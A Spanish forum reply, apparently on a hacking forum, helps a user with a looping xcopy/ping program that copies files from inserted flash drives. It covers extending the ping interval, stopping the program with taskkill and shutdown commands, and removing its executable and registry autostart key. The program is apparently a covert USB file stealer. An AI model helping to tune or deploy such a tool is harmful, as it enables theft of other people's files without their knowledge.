Respecto a que las memorias flash se puedan extraer de forma segura... la única forma es esperando a que acabe de copiar archivos y ampliando el tiempo de los pings. (Sólo puedes extraer una memoria flash de forma segura cuando no se está copiando ni comprobando nada, y esto se produce en el tiempo que dura el ping...) prueba a ampliarlo a tu gusto.

En cuanto a lo de que no se deja reiniciar, es porque el programa está haciendo su trabajo. Si quieres hacer que se pare por completo tienes dos opciones, o ir al administrador de tareas y parar los procesos correspondientes (el ping.exe, el xcopy.exe, el cmd.exe y %elnombredetuejecutable%.exe). Esto lo puedes automatizar en un batch de la siguiente forma:

Taskkill /IM cmd.exe /f
(supongo que al parar el cmd.exe se paran los otros, si no añade sus nombres de la misma forma)
Shutdown -r -t XX
Siendo -r la opción de reinicio (la de apagado es -s) y las XX el tiempo en segundos (P.Ej: 30, 03, 00...)

Respecto a lo de la desinstalación... debes borrar el ejecutable que hayas creado MIENTRAS ESTÉ PARADO (de lo contrario borras el archivo, pero éste sigue cargado en memoria, es decir, ejecutándose), y además la rama del registro que ha creado.
Esto lo puedes borrar desde el MSCONFIG, o si tienes el SpyBot, desde las opciones avanzadas.

Bueno, si te queda alguna duda, házmelo saber y trataré de responderte.

Nos vemos  ;)

PD: 8789poli, si te gusta el código se lo agradeces por privado la próxima vez, no vayas creando posts que no aportan nada y no vienen a cuento.

Venga, a cuidarse todos...
« Última modificación: 21 Noviembre 2008, 19:45 pm por corax » En línea

Nuestro idioma ha tardado 12 siglos en llegar hasta hoy día. Tú tan sólo tardas 20 segundos en escribir un post: no destroces en tan poco tiempo lo que tantos siglos ha costado crear.
Páginas: 1 [2] 3 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Problemas implementando un stealer...
Análisis y Diseño de Malware
Debci 9 5,422 Último mensaje 9 Abril 2013, 11:10 am
por Debci
[Delphi] DH ScreenShoter Stealer 0.2
Programación General
BigBear 0 2,002 Último mensaje 25 Noviembre 2013, 15:34 pm
por BigBear
[Delphi] DH WebCam Stealer 0.2
Programación General
BigBear 1 2,355 Último mensaje 29 Noviembre 2013, 15:39 pm
por daryo
Ayuda Código CMD- USB Stealer
Scripting
shhadow9 5 3,641 Último mensaje 28 Junio 2014, 07:32 am
por Eleкtro
stealer web y crypter
Scripting
arthusu 0 1,477 Último mensaje 22 Junio 2018, 04:37 am
por arthusu
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines